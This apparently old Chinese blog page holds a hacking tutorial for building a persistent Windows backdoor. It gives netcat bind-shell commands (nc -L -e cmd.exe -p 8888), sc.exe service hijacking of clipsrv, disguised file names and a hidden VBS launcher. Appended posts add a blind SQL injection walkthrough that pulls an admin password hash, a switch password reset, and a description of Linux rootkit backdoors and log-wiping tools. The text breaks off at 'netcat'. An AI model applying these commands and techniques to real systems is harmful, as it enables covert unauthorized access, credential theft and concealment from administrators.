空间管理您的位置: IXPUB技术博客 » 我们都是只有一只翅膀的天使，无法割舍彼此 » 日志

别说爱就一个字，你数数你说过几次；别说程序员好干，你看看你年薪几万！~ 别说你爱的太真，伤的却太深——只要真心的投入就无悔、无怨恨别说失去的太多，那是不懂得收获；别说爱了又错过，那是你没有去收获住那么硕果！~ 请真心你现在所拥有的一切——守侯住属于你的爱情！FOR ever

（申精）黑客实战之攻击篇——用NC打造成自己的简单后门

上一篇 / 下一篇 2007-12-31 09:52:29 / 个人分类：饕餮

查看( 200 ) / 评论( 27 )

（部分资料为入侵相关论坛Archiver页面所得，不尽完全，见谅）

大家都知道nc是一个强大并且灵活的黑客工具，用他可以做很多事情，譬如做为telnet的客户端口，譬如入侵的时候反弹回来shell，譬如扫描……但是你有没有想过将他打造成一个服务级的后门呢？现在好多跟我一样的菜鸟还不懂得编程，别人写的流行点的后门又经常被杀，那就跟我一起来自己手工制作一个后门吧，不需要任何编程知识菜鸟级的东东哦。

　　首先请准备好不被杀的nc.exe（随便加个壳就可以了的），还有sc.exe（这个是操作服务的一个小工具，被人称为操作服务的军刀），这些就可以打造我们自己的后门了，后门的要求我想不需要很强的操作功能，只需要当我们连接的时候获得一个system权限的shell就可以了，有了cmdshell做什么不可以呢。如果你需要反弹的后门，也可以做到，自己注册个域名就可以用nc反弹了，因为比较复杂这里就不说了。我们知道nc就是实现我们的后门功能的最经典的工具，我们来看看nc的帮助，命令行下输入nc -h就可以看到，我们主要用到的几个参数如下：

-e 绑定一个程序并且连接时执行
-l 非法词模式
-p 指定nc要运行的本地端口
-L 增强了的非法词模式，当连接断开时再次非法词
　　
　　至于其他的用法相信各位已经很了解了的，我们以前经常用到的是

nc -l -e cmd.exe -p 8888 非法词8888端口，当有连接时重定向到cmd.exe实现绑定一个shell

　　这样的形式用serveru等溢出程序执行后来绑定一个可以得到shell的端口8888，我们telnet或者nc连接上来的时候就可以直接获得一个shell。但是这样连接断开之后非法词的端口就会关闭，是一次性的，不能再次获得shell，这样当然不适合于做后门了。后来发现nc的这个参数L可以一直保持非法词的状态，可以反复连接。用

nc -L -e cmd.exe -p 8888 也是绑定的，不过加强了的

　　这样的命令就已经达到我们的目的了，但是我们往往是在溢出的shell里工作，留后门是为了以后的进入，那我们如何保证nc再机器重起之后还可以工作从而实现我们的后门的目的呢？你可以把他放到注册表的Run等启动项下面，但是感觉那样不是太好，有些地方已经被杀毒软件盯上了，把我的后门放到那里实在不是很放心，后来想到干脆作成服务吧！随着系统启动而启动，呵呵。那就看看如何打造服务吧！

　　首先我们将nc.exe放到%systemroot%system32下面，起名叫svch0st.exe或者放到%systemroot%system下面更名叫svchost.exe，这样的目的是为了在任务管理器里看不出异样。然后用sc替换系统的服务，不用改别的，只要修改他的执行路径就可以了，我们就改那个clipsrv.exe服务吧！命令如下：

sc config clipsrv start= auto 将clipsrv.exe服务设置为自动
sc config clipsrv binpath= "c:winntsystem32svch0st.exe -L -e cmd.exe -p 8888" 设置clipsrv.exe服务的启动路径为我们的nc
sc start clipsrv 启动clipsrv.exe服务

　　嘿嘿，但是看看结果吧！看看服务里的显示信息，如图一，很显眼哦！不管，先启动服务然后

netstat -an　find "8888" etstat -an的结果中查找8888看我们的程序是否运行
　　的确是已经被打开了，但是当显示服务没有响应的时候nc的进程被结束了，这是Windows服务管理机制吧。不是很成功呵，我们继续改造！不懂编程的我们这个时候就会很郁闷，因为不能让服务停止响应的时候我开始想用bat2exe.exe，但是启动服务的时候总是出现拒绝访问的错误，大概是bat2exe出来的exe文件不被系统服务格式所支持，只能想其他的办法了，于是我想到了用Winrar.exe来做我们自己的exe文件，这总该被服务的可执行文件支持吧！至于如何实现编程里的子进程在父进程终止后仍然可以在内存中运行，我用的方法是写个run.vbs然后用cscript.exe来调用，至于如何调用就可以在自解压格式里设置解压后运行cscript.exe run.vbs，如图三。其中Run.vbs里的内容如下：

dim sh 定义变量
set sh=createobject("wscript.shell") 取得WSH对象
sh.run "nc -L -e cmd.exe -p 8888",0 执行我们的程序并隐藏错误

　　而自解压的路径写上%systemroot%system32，这样我们自解压服务程序就做好了，保存为c1ipsrv.exe（不好意思，还是用那个1和l的把戏），放到c:winntsystem32目录下面。现在修改我们的clipsrv剪切薄服务的具体路径为c:winntsystem32c1ipsrv.exe，命令如下:

sc stop clipsrv 将clipsrv.exe服务设置为自动
sc config clipsrv start= auto
sc config clipsrv binpath= "c:winntsystem32c1ipsrv.exe" 设置clipsrv.exe服务的启动路径为我们的nc
sc start clipsrv 启动clipsrv.exe服务

　　现在一切OK了，这样以来我们的程序的参数细节还会被屏蔽，比开始的参数直接放到执行文件路径里好多了。我们来实验下。先net start clipsrv，然后netstat -an　find "8888"看看开没开8888端口，最后用nc 127.0.0.1 8888连接上去得到shell了呵！如图四。好了，快去体验自己动手的快乐哦，你还可以作其他的事情，只要你的服务的程序做的够好，甚至可以用反向回来的nc，具体我就不写了。

　　本文是我看了韩的一个动画之后想到的，后来自己想到完全可以将nc改成后门的，不过也还是有很大的缺陷，毕竟不是编程，因为不能返回信息给服务控制器，会在日志里留一些错误，不过，有多少人去在意这些错误呢？还有就是没有身份验证功能，不过端口可以自定义不知道算不算一个身份验证。

[本帖最后由 grjboy30 于 2007-12-2 00:00 编辑]

全部脚印 不留脚印留下脚印:

网络忏悔

论坛模式推荐收藏分享给好友推荐到圈子管理

TAG:

grjboy30 发布于2007-12-01 23:43:00: 破解交换机密码地全部过程　　交换机和路由器都需要有一定的安全保证,也就是说要及时为他们配置合理的密码，那么如果这个密码忘记了怎么办呢？笔者就遇到过这么一次，由于岗位调动，以前的网络管理员离开了本部门，却把交换机上设置了密码，而且没有告诉我这个接任的网络管理员。怎么办呢？送回厂商破解又太麻烦了。于是我亲手经历了一次破解密码的过程。 blog.ixpub.net(XVu @4E;~
T8ke/sK'M-{%mMr
　　一，网络环境：

　　公司使用实达的3500系列（具体型号是3548）交换机，在交换机上面连接了一台华为2621路由器，通过电信的光纤上网。实际情况这台实达3548交换机被以前的网络管理员设置了密码而没有告诉我。所以破解他的密码成为本篇文章的核心。

　　二，准备工作：
(~x
qTT-T9Q*l
　　由于整个工作需要断网，毕竟涉及到重新启动交换机等操作，所以选择时间在工作下班后的晚上23点。另外由于破解密码这类操作都必须使用CONSOLE控制台线来设置，所以地点只能是中心机房。笔者找到了实达3548设备的所有相关工具，包括安装说明与CONSOLE控制线等。
JM$AHD)B
　　三，实战破解密码：

　　根据笔者以往经验实达所有设备的使用和操作命令语句都应该和CISCO设备类似，所以原本以为按照破解CISCO设备密码的步骤就可以轻松搞定。谁知道一上手才发现原来差别还真不小。一般来说CISCO设备都是通过修改配置寄存器configuration register来实现破解密码的操作。在实达交换机中根本不存在配置寄存器configuration register这个概念。通过查询资料才发现，原来实达交换机是使用修改超级终端配置的方法来破解密码的。

　　第一步：将实达交换机的配套CONSOLE控制线连接到设备的CONSOLE管理接口。
{Ri5yqm ^Xblog.ixpub.net
dbud,V+F:x'\　　第二步：将CONSOLE控制线的另一断连接到网络管理员调试使用的笔记本的COM串口上。
7^SO(cB}&j!oblog.ixpub.net
　　第三步：进入笔记本系统桌面，点“开始->所有程序->附件->通讯->超级终端”。
b!ZWQ*i%QXIXPUB技术博客
NBW
|Tv-f7nIXPUB技术博客　　第四步：启动系统的超级终端后我们随便为新建立的连接起一个名字。 ;z`3E`]ha Gc8M

　　第五步：在连接设置处的“连接时使用”地方通过下拉菜单选择刚刚使用CONSOLE控制线连接的端口。例如COM1口。
gAonDIXPUB技术博客.D7m j| vNlEf3G
　　第六步：在COM1属性设置窗口中我们对连接的参数进行配置。一般来说我们正常连接交换机应该采用每秒位数9600，数据位为8，奇偶校验是无，停止位是1，数据流控制是无。不过要是想破解实达交换机的密码的话就需要修改这些数值。将PC超级终端串口速率设成57600，其他和上面写的相同即可。 blog.ixpub.net7D#z3Yt*b"K.J8g
　　第七步：使用终端连接到交换机后，再打开交换机的电源，在交换机启动后进行自检时立即按下“ESC”键多次进入交换机的监控模式。终端界面将出现多个选项，包括一些基本的初始化设置。
/[k
@,rA.Mblog.ixpub.net(a;W\ ~r:u+nN~+?
　　小提示： RM7|lF+t+gk-s

r&\gDGi
H　　刚开始笔者按照第七步的步骤尝试并没有成功，超级终端界面总是显示很多个“。。。。。”。后来才发现原来交换机必须在超级终端连接后才能加电启动，如果先开交换机再用超级终端连接的话则无法进入监控模式。 gy
|4V-s\
5R-VW;frx|-E5b,^
　　第八步：根据菜单提示，将配置文件config.text上传（Upload）至网络管理员使用的笔记本，然后删除交换机上的配置文件Config.text。
1K|.Z4Y
PtgPMUblog.ixpub.net
　　第九步：在笔记本上打开刚下载的保存在系统硬盘中的config.text文件，将以下语句
blog.ixpub.net:W H6W&TM6O0TC;D\
　　enable secret level 1 5 !E,1u_;C9&-8U0H
!NU{*Y(CrZ}IXPUB技术博客
　　enable secret level 15 5 *r_1u_;C3vW8U0H

　　删除然后保存退出。
1]q6V)N5It/}Or7Vblog.ixpub.net
　　第十步：根据交换机监控模式的提示，将笔记本上修改的config.text再下载（Download）到交换机中。 IXPUB技术博客0sdw2M%GY
nQl-j9c*oxm
　　第十一步：重新将笔记本的超级终端串口速率设成9600，其他保持默认参数。交换机加电重启后，进入交换机配置界面，你就会发现我们可以重新配置交换机的密码了，包括远程TELNET的管理密码以及本机的特权密码。此后交换机的密码也将变成你刚刚配置的，而其它配置则保留不变，并不会影响任何使用。

　　小提示：
.FJ2\r
y5s-~
　　在实际使用中笔者发现使用实达3550交换机的监控模式中的上传和下载文件功能并不稳定，经常出现传输失败的提示。所以笔者索性直接在监控模式中将config.text删除，然后重新启动交换机重新配置所有交换机信息。这种情况适用于交换机自身配置不多也不复杂，另外网络管理员也需要对设置语句比较熟悉。 Wv
Y&WA+{\3K2DX

　　总结：
:]Qs^;XO"Lo\8UX'RF1Y+f#}
　　经过本次实战破解交换机密码的操作，笔者再次明白了对于路由交换设备来说，不同厂商操作程序和步骤绝对是不同的，即使命令语句类似但是在其他高级操作上还是大相径庭的。因此本篇文章介绍的所有内容仅仅是针对实达路由器与交换机，如果你遇到的是其他设备则需要采取其他的方法来解决。

grjboy30 发布于2007-12-01 23:43:21: SQL注入漏洞初级应用之Access篇　　如果你已经掌握了SQL注入漏洞的一些相关的基础知识，那是不是觉得看了理论有一种想急于知道如何实际动手操作的冲动，好吧，Let’s go，这篇文章我们就来实战SQL注入，不过针对网站的数据库是ACCESS的，毕竟在国内都是用虚拟机，一般只有FTP上传权限，所以还是很有市场的。
BS8V
~(s xblog.ixpub.net
vxU*Wp&EFT
　　首先要注意的是，如果你以前没试过ＳＱＬ注入的话，那么第一步先把IE菜单=>工具=>Internet选项=>高级=>显示友好 HTTP 错误信息前面的勾去掉。否则，不论服务器返回什么错误，IE都只显示为HTTP 500服务器错误，不能获得更多的提示信息。 ?C0}4?5t;kh3Z-o
r

s'L(Vl4dD　　1．入侵测试目标：
~}1A|3r"Z-qblog.ixpub.net
!VC3^%LZr)aF)m　　前不久我们学校的一个同学做了个网站，做的还挺漂亮的，叫我去看下，我顺便对它进行了一次安全检测。文章发表前已经征得该同学的同意，请不要效仿。下面的真实网址已经被我屏蔽。
;]_aepR1g0^_Cr,xpIXPUB技术博客$D)I#]B:i
　　测试网站：http://www.xxx.com/index.asp
-Yu'pEP3}blog.ixpub.net/Rd+a.MQ
　　2．寻找可能的SQL注入点 -|d*v,s;u9k,fL

)~)Uo
j`P$w　　我们知道，一般的文章管理系统，下载系统，论坛，留言本，相册等都会有个show.asp?id= list.asp?id= news.asp?id= 什么的，其实一看就知道是调用SQL语句查询数据库并显示出来。我们不难发现这个站的新闻系统就是show.asp?id=的形式，随便点一个链接得到地址如下：
*d@n&z.N,dX~Fg#f)H2gP
　　http://www.xxx.com/show.asp?id=474
,I0Cx+CEPIa'Ne%Zy(NJ
]
　　从这个地址就知道是通过show.asp执行SQL语句访问数据库，可想而知，SQL语句原貌大致如下：
B|7?Jq"Y6kz6jIXPUB技术博客IXPUB技术博客 C;X
oF|7QU!Y4d
　　select * from 表名 where 字段=xx，如果这个show.asp对后面的id整型参数过滤好的话，就可能存在SQL注入漏洞。 ]5RhBv3x)O

　　3．判断SQL注入是否存在 IXPUB技术博客+a.A.sMJkj;e

_&_ O6H+e*qX&D
D2G%jblog.ixpub.net　　通过上面的分析知道，要判断有没有SQL注入漏洞，就得看show.asp有没对参数过滤好，所以可以用以下步骤测试SQL注入是否存在。
,tG'_4qn2Os~　　a．最简单的判断方法

　　在要检测的网址后面加一个单引号：http://www.xxx.com /show.asp?id=474’ blog.ixpub.net xU
p{!Es

　　此时show.asp中的SQL语句变成了：select * from 表名 where 字段=xx’，如果程序没有过滤好“’”的话，就会提示 show.asp运行异常；但这样的方法虽然很简单，但并不是最好的，因为：
m8S&[;j"Op8P6krIXPUB技术博客
　　第一：不一定每台服务器的IIS都返回具体错误提示给客户端，如果程序中加了cint(参数)之类语句的话，SQL注入是不会成功的，但服务器同样会报错，具体提示信息为处理 URL 时服务器上出错。请和系统管理员联络。
/vTiS&I9AK4P
　　第二：由于以前存在过的1’ or ‘1’=’1漏洞，所以目前大多数程序员已经将“’“ 过滤掉，所以用" '"测试不到注入点，所以一般使用经典的1=1和1=2测试方法，如下： IXPUB技术博客5dr \^}.n$m,X
O0wHJ?YA
　　http://www.xxx.com /show.asp?id=474 and 1=1, show.asp运行正常，而且与http://www.xxx.com /show.asp?id=474运行结果相同，如图1：
4k2E%LIL/x0Hblog.ixpub.net
[attachment=1259]
u|8nYBHLo9GIXPUB技术博客+m)bX&`?
　　http://ww.xxx.com /show.asp?id=474 and 1=2, show.asp运行异常，（这就是经典的 1=1 1=2 判断方法）如图2：
[attachment=1260] P7p|"B`o!? YzXB4h

　　这里很明显当加 and 1=1 的时候返回完全正常的页面，加 and 1=2 显示：暂时还没有文章！
blog.ixpub.netG%~ @xI
　　到这里基本上可以断定他存在SQL注入，至于能不能注出账号密码来，还需要更进一步的注入测试，这里只能得到SQL注入点： http://www.xxx.com/show.asp?id=474
]:]C0Jd)tv;r7{7L　　4．判断表是否存在 blog.ixpub.net%?f%cRRG%n2h8v

m-Qf |j　　国内的一般程序员在设计数据库的时候都会用一些特定的做为表名，字段名什么的。比如说后台管理员一般放在表admin里面，而注册的用户放在表users里，当然，只是一般，依照各程序的不同而不同。 3J5i\zX%bt/G
blog.ixpub.netE7xm7e.Sb,[
　　这个站是我同学自己写的，我还是先判断管理员表admin是否存在，在后面加上语句：and exists (select * from admin)变成http://www.xxx.com/show.asp?id=474 and exists (select * from admin)提交访问后返回的页面如图3：
;{Y JpPW^[attachment=1261] blog.ixpub.net2V'U7K4ic"})\
T

　　这就说明我猜的admin表名不存在，继续猜另外的名字，这里可以参考国内常见的程序的表名，比如：admin user vote manage users 会员用户管理员 admin_admin userinfo bbs news system等，这个站我最后猜到的是：users，语句：and exists (select * from users)。

t"[]"v;?　　5．进一步判断表里的字段是否存在 "P~:N8PsE

　　判断字段id 是否存在，这个一般都有，自动编号。如果存在了顺便猜一下管理员的id值。

　　判断存在语句：and exists(select id from users) blog.ixpub.netHx9ahU

　　判断编号语句：and exists(select id from users where id=1)
IXPUB技术博客(t#H'q[1];J t.DZ
　　一般管理员账号密码放在第一位，也就是id=1,如果不是就猜下去，猜id=2 猜id=3等啦。 IXPUB技术博客1MoW*y6Y)P0jB

　　由于这个站是自己写的代码，所以会有点不同，当判断是否不过你可以猜到他的对应的可能是userid,因为他表名取做user呀，把上面的id改为userid就返回了正常的页面，如图4：
[attachment=1262]
)ad+by!{.k1O%z'v
　　至于这个userid值为多少，同样猜，and exists(select userid where userid=1)改变1这个数字，一直猜到页面显示正常为止。这里我猜到的是userid=11，如图5：L&Qk ptbE.`\

bolr-@!N)Hblog.ixpub.net[attachment=1263] blog.ixpub.net-@"t\f;X9Ba
e"m*X"VN
　　最后猜出这个继续猜出其它的字段，用户名字段最后为username，密码字段为userpwd，用到的语句分别为：and exists (select username from users)和and exists (select userpwd from users)，这里就不抓图了。
{*kF^#oT]IXPUB技术博客　　6．再进一步判断账号和密码的长度 &Z,z0d1lj0UK~4qd

"{9h^DP7B }.K|　　这里我说一下常用的方法，判断的时候大于小于一起用嘛，学过数据结构的人都知道有二分法，我这里也引用一下，比如说你判断 >4 而又判断<12 那我接下来就取中间的看是大于8还是小于8，如果是大于8则说明在8到12之间，如果是小于8说明在4到8之间，再接着用二分法判断下去。。。。。。当然由于账号密码一般人不会太长，所以在这里二分法的优势体现的不够明显，不过到下面猜账号密码字符的时候就能明显感受到了。
sb2UJ7R2l
pVt0HCTe`~　　首先判断账号username的字符长度：and exists (select userid from users where len(username)<10 and userid=11)，返回正常说明长度小于10，and exists (select userid from users where len(username)>5 and userid=11)，返回不正常说明长度小于5，最后猜到的是
IXPUB技术博客5I*K~^CtJ
　　and exists (select userid from users where len(username)=4 and userid=11)，说明账号的长度为4，也太短了吧，呵呵，别高兴的太早，如图6：

[attachment=1264]
YLsNZ;F!o/sIXPUB技术博客
S L*Qym9neqVbblog.ixpub.net　　再接下来猜密码长度，与猜解账号长度类似，最后猜到密码长度为16位，语句：and exists (select userid from users where len(userpwd)=16 and userid=11)，不过我要提醒的是，一般遇到16位或者32位的密码，我都会想到MD5加密，当然可以暴力破解。
-xI8f.R.Ld%dblog.ixpub.net
S*Qf-]Fs"n1l&aIXPUB技术博客　　到此，我们得到的信息如下： IXPUB技术博客CU9wf`7c5o

A|)s'e!K
o&b-c\aK　　账号username长度：4

s
S;G$h+C7T Y+tIXPUB技术博客　　密码userpwd长度：16
:\8t(`e(W;WIXPUB技术博客　　7．猜解账号密码字符
&\k2j3w6uHeLm~S
　　在这里的猜解要用到asc(mid())这个函数。前面基础篇我们已经讲过这些函数了，我这里稍提一下。asc()是把字符转换为其对应的ASC码，mid()则是定位字符串里的字符。

　　格式：mid(字符串，开始位置，子串长度)

I%o/Y rc5dQ,H;z`　　比如说mid(name,1,1)即取name字符串里第一个字符。如果这里的name等于xysky 则mid(name,1,1)=x而mid(name,1,2)则取y IXPUB技术博客dS\ps*|

};l'M)`Kk[(\blog.ixpub.net　　这两个函数结合asc(mid())则是先定位字符串里的字符再取其ASC码，比如asc(mid(username,2,1))则是判断username字符串里的第二位的ASC码，在SQL注入里常用它，有汉字也不用怕,不过遇上了汉字确实有点郁闷,中文字符的asc值小于0的。在后面加上如下的语句： (WyR}DD!uL:Q7{

!v|+Zo!t7{`　　and 11=(select userid from users where asc(mid(username,1,1))<0) 返回正常，说明账号果然是汉字，下面的事就不那么容易了。下面我们用到二分法的思想开始猜解第一位字符： 6V_\L*M$MX

　　and 11=(select userid from users where asc(mid(username,1,1))<-19000) 返回正常 IXPUB技术博客u;r/HjDU]Vz

T7e3n!@U2L　　and 11=(select userid from users where asc(mid(username,1,1))>-20000) 返回正常 blog.ixpub.net2\s8E%p'jpNA
-p,\4]6B"KQc1`2C
　　以上说明账号的第一个字符的ASCII码在-19000和-20000之间，再用二分法猜解下去，最后的第一个为:-19765
xAwQ;@1Rt
/[2c!P(?-fx
d;nTB　　and 11=(select userid from users where asc(mid(username,1,1))= -19765) blog.ixpub.net(Es-CU,\%IS

/F2Nm/z"P'tr8n!Hl　　ASCII码为-19765对应的字符就是：菜
4Ez;fe8iN Z"W"X|iA
　　下面接着猜第二个字符，最后语法为：and 11=(select userid from users where asc(mid(username,2,1))=-15119)，这里抓个图，如图7：
%Qz#J-eNv{4IIXPUB技术博客[attachment=1265]

　　对应字符为：鸟

　　到这里我想其它不用猜了，因为这个网站上的信息已经告诉我们了： ,J @!^M2\
blog.ixpub.nets
N?1Nw`
　　作者：菜鸟老师票数：0等级:点击：308 呵呵，如果没错的话就是它了。 IXPUB技术博客]6V-{kQsC
IXPUB技术博客c2u'fs*ugrf^,nw
　　接着猜密码，依然二分法，就不抓图了：

　　and 11=(select userid from users where asc(mid(userpwd,1,1))<50) blog.ixpub.net\6T|N"H

　　and 11=(select userid from users where asc(mid(userpwd,1,1))>40)
:LLf9AJ{blog.ixpub.net
JnI4?4ArQ?9Tblog.ixpub.net　　最后得到的为：48 对应的字符就是0
S0~2?q+Eni
　　依此下去，最后得到加密后的MD5值为：00d60a849c6c381e ，由于MD5目前没有好的破解方法，只能暴力破解，我们就此打此。 Mv"v0s\
　　8．后台的猜解
RwQ9rTM2r$oblog.ixpub.net5W_0~)e(\
　　经过前面辛苦的猜解，我们已经得到这个网站的账号密码了，当然这里已经是MD5加密了，我们只是说一下常规的SQL注入攻击中的一步，往往也是最为关键的一步：寻找网站管理后台。像这样动态生成页面的网站，一般都会有个管理后台的，添加文章编辑文章修改文章删除文章什么的，而一般的程序员在命名后台的时候往往是：admin_index.asp admin_login.asp admin.asp admin/admin_index.asp admin/admin_login.asp，当然还有退出后台的文件：logout.asp admin_logout.asp admin/admin_logout.asp等。一个一个的访问，结果嘛，我只能说靠运气加上你的经验了。以这个站为例，前面那些登录的我一个也没猜到，因为我猜到有admin这个目录，我就一直以为登录的页面也在admin目录，猜了好久，最后无意访问admin/logout.asp，页面居然自动转到后台登录页面了，居然是上一级目录的login.asp，我狂汗，如图8： blog.ixpub.net4f-xY;\:rl
[attachment=1266]

.w.Kq@(?6Jblog.ixpub.net　　有了后台，有了账号密码（当然这个站是MD5加密的密码，我也懒得破解），你就可以进后台了，至于进后台你能做什么，就看后台的功能与你的技术了，你想做什么，就依靠你自己了，本文只演示SQL注入漏洞最基本的注入，想深入研究的朋友一定要好好掌握哦！

grjboy30 发布于2007-12-01 23:43:43

Linux下的后门和日志工具　　攻入Linux系统后，很多入侵者往往就开始得意忘形了。这其中还有一个原因，就是技术性也要求更高了。下面，我们来看看一些常用的经典工具。

　　1、从这里延伸：后门和连接工具

　　（1）Httptunnel

　　Tunnel的意思是隧道，通常HTTPTunnel被称之为HTTP暗道，它的原理就是将数据伪装成HTTP的数据形式来穿过防火墙，实际上，它是在HTTP请求中创建了一个双向的虚拟数据连接来穿透防火墙。说得简单点，就是说在防火墙两边都设立一个转换程序，将原来需要发送或接受的数据包封装成HTTP请求的格式骗过防火墙，所以它不需要别的代理服务器而直接穿透防火墙。

　　HTTPTunnel包括两个程序：htc和hts，其中htc是客户端，而hts是服务器端，我们现在来看看我是如何用它们的。比如开了FTP的机器的IP是192.168.10.231，本地机器IP是192.168.10.226，因为防火墙的原因，本地机器无法连接到FTP上。怎么办？现在就可以考虑使用HTTPTunnel了。过程如下：

　　第一步：在本地机器上启动HTTPTunnel客户端。用Netstat看一下本机现在开放的端口，会发现8888端口已在侦听。

　　第二步：在对方机器上启动HTTPTunnel的服务器端，并执行命令“hts -f localhost:21 80”，这个命令的意思是说，把本机的21端口发出去的数据全部通过80端口中转一下，并且开放80端口作为侦听端口，再用Neststat看一下他的机器，就会发现80端口现在也在侦听状态。

　　第三步：在本地机器上用FTP连接本机的8888端口，会发现已经连上对方的机器了。那么，为什么人家看到的是127.0.0.1，而不是192.168.10.231呢？因为我们现在是连接本机的8888端口，防火墙肯定不会有反应，如果没往外发包，局域网的防火墙肯定就不知道了。现在连接上本机的8888端口以后，FTP的数据包不管是控制信息还是数据信息，都被htc伪装成HTTP数据包然后发过去，在防火墙看来，这都是正常数据，相当于欺骗了防火墙。

　　需要说明的是，这一招的使用需要其他机器的配合，就是说要在他的机器上启动一个hts，把他所提供的服务，如FTP等重定向到防火墙所允许的80端口上，这样才可以成功绕过防火墙！肯定有人会问，如果对方的机器上本身就有WWW服务，也就是说他的80端口在侦听，这么做会不会冲突？HTTPTunnel的优点就在于，即使他的机器以前80端口开着，现在也不会出现什么问题，重定向的隧道服务将畅通无阻！

　　（2）Tcp_wrapper

　　Tcp_wrapper是Wietse Venema开发的一个免费软件。Tcp_wrapper的诞生有个小小的故事，大约1990年，作者所在大学的服务器屡屡受到一个外来黑客侵入，因为受害主机的硬盘数据屡次被rm -rf/命令整个抹掉，所以找寻线索极为困难，直到有一天晚上作者在工作的过程中无意中发现这个黑客在不断的finger 受害主机、偷窥受害者的工作。于是，一个想法诞生了：设计一个软件，使它可以截获发起finger请求的IP，用户名等资料。Venema很快投入了工作，而Tcp_wrapper也由此诞生！此后，Tcp_wrapper随着广泛的应用逐渐成为一种标准的安全工具。通过它，管理员实现了对inetd提供的各种服务进行监控和过滤。

　　Tcp_wrapper编译安装成功后，会生成一个tcpd程序，它可以在inetd.conf这个控制文件中取代in.telnetd的位置，这样，每当有telnet的连接请求时，tcpd即会截获请求，先读取管理员所设置的访问控制文件，合乎要求，则会把这次连接原封不动的转给真正的in.telnetd程序，由in.telnetd完成后续工作。如果这次连接发起的ip不符合访问控制文件中的设置，则会中断连接请求，拒绝提供telnet服务。Tcp_wrapper访问控制的实现是依靠两个文件:hosts.allow，hosts.deny来实现的。如果我们编辑/etc/syslog.conf文件时，加入了日志纪录功能，即：

　　#tcp wrapper log
　　local3.info /var/log/tcplog

　　编辑结束后，保存文件，在/var/log下会生成tcplog文件，注意这个文件的读写属性，应该只对root有读写权限。然后ps -ef 　 grep syslogd，找出syslogd的进程号，kill -HUP 重启syslogd进程使改动生效。在这里，我们可以预先看一看以后生成的tcplog文件内容，如下：

Jul 31 22:00:52 www.test.org in.telnetd[4365]: connect from 10.68.32.1
Jul 31 22:02:10 www.test.org in.telnetd[4389]: connect from 10.68.32.5
Jul 31 22:04:58 www.test.org in.ftpd[4429]: connect from 10.68.32.3
Aug 2 02:11:07 www.test.org in.rshd[13660]: connect from 10.68.32.5
Aug 2 02:11:07 www.test.org in.rlogind[13659]: connect from 10.68.32.1

　　从上面我们可以看到，在安装了Tcp_wrapper的主机上，系统的每一次连接，Tcp_wrapper都做了纪录，它的内容包括时间、服务、状态、ip等，对攻击这有很大的参考价值，不过，一定要记得清除日志了。
　　（3）rootkit工具：LRK

　　Rootkit出现于二十世纪90年代初，它是攻击者用来隐藏自己的踪迹和保留root访问权限的工具。通常，攻击者通过远程攻击或者密码猜测获得系统的访问权限。接着，攻击者会在侵入的主机中安装rootkit，然后他会通过rootkit的后门检查系统，看是否有其他的用户登录，如果只有自己，攻击者就开始着手清理日志中的有关信息。通过rootkit的嗅探器获得其它系统的用户和密码之后，攻击者就会利用这些信息侵入其它的系统。

　　如果攻击者能够正确地安装rootkit并合理地清理了日志文件，系统管理员就会很难察觉系统已经被侵入，直到某一天其它系统的管理员和他联系或者嗅探器的日志把磁盘全部填满，他才会察觉已经大祸临头了。不过，在系统恢复和清理过程中，大多数常用的命令例如ps、df和ls已经不可信了。许多rootkit中有一个叫做FIX的程序，在安装rootkit之前，攻击者可以首先使用这个程序做一个系统二进制代码的快照，然后再安装替代程序。FIX能够根据原来的程序伪造替代程序的三个时间戳(atime、ctime、mtime)、date、permission、所属用户和所属用户组。如果攻击者能够准确地使用这些优秀的应用程序，并且在安装rootkit时行为谨慎，就会让系统管理员很难发现。

　　下面我们介绍一个非常典型的针对Linux系统的LRK版本6。Linux Rootkit 6是一个开放源码的rootkit，经过多年的发展，Linux Rootkit的功能越来越完善，具有的特征也越来越多。下面我们简单地介绍一下Linux Rootkit包含的各种工具。

　　首先是隐藏入侵者行踪的程序。为了隐藏入侵者的行踪，Linux Rootkit IV的作者可谓煞费心机，编写了许多系统命令的替代程序，使用这些程序代替原由的系统命令，来隐藏入侵者的行踪。这些程序包括：

ls、find、du	这些程序会阻止显示入侵者的文件以及计算入侵者文件占用的空间。在编译之前，入侵者可以通过ROOTKIT_FILES_FILE设置自己的文件所处的位置，默认是/dev/ptyr。注意如果在编译时使用了SHOWFLAG选项，就可以使用ls -/命令列出所有的文件。这几个程序还能够自动隐藏所有名字为：ptyr、hack.dir和W4r3z的文件。
ps、top、pidof	这几个程序用来隐藏所有和入侵者相关的进程。
netstat	隐藏出/入指定IP地址或者端口的网络数据流量程。
killall	不会杀死被入侵者隐藏的进程。
ifconfig	如果入侵者启动了嗅探器，这个程序就阻止PROMISC标记的显示，使系统管理员难以发现网络接口已经处于混杂模式下。
crontab	隐藏有关攻击者的crontab条目。
tcpd	阻止向日志中记录某些连接。
syslogd	过滤掉日志中的某些连接信息。

　　其次是后门程序。木马程序可以为本地用户提供后门；木马网络监控程序则可以为远程用户提供inetd、rsh、ssh等后门服务，具体因版本而异。随着版本的升级，Linux Rootkit IV的功能也越来越强大，特征也越来越丰富。一般包括如下网络服务程序：

chfn	提升本地普通用户权限的程序。运行chfn，在它提示输入新的用户名时，如果用户输入rookit密码，他的权限就被提升为root。
chsh	提升本地用户权限的程序。运行chsh，在它提示输入新的shell时，如果用户输入rootkit密码，他的权限就被提升为root。
passwd	和上面两个程序的作用相同。在提示你输入新密码时，如果输入rookit密码，权限就可以变成root。
login	允许使用任何帐户通过rootkit密码登录。如果使用root帐户登录被拒绝，可以尝试一下rewt。当使用后门时，这个程序还能够禁止记录命令的历史记录。
inetd	特洛伊inetd程序，为攻击者提供远程访问服务。
rshd	为攻击者提供远程shell服务。攻击者使用rsh -l rootkitpassword host command命令就可以启动一个远程root shell。
sshd	为攻击者提供ssh服务的后门程序。

　　再就是工具程序。所有不属于以上类型的程序都可以归如这个类型，它们实现一些诸如：日志清理、报文嗅探以及远程shell的端口绑定等功能，包括：

fix	文件属性伪造程序。
linsniffer	报文嗅探器程序。
sniffchk	一个简单的bash shell脚本，检查系统中是否正有一个嗅探器在运行。
login	允许使用任何帐户通过rootkit密码登录。如果使用root帐户登录被拒绝，可以尝试一下rewt。当使用后门时，这个程序还能够禁止记录命令的历史记录。
z2	utmp/wtmp/lastlog日志清理工具。可以删除utmp/wtmp/lastlog日志文件中有关某个用户名的所有条目。不过，如果用于Linux系统需要手工修改其源代码，设置日志文件的位置。
bindshell	在某个端口上绑定shell服务，默认端口是12497。为远程攻击者提供shell服务。

　　（4）netcat

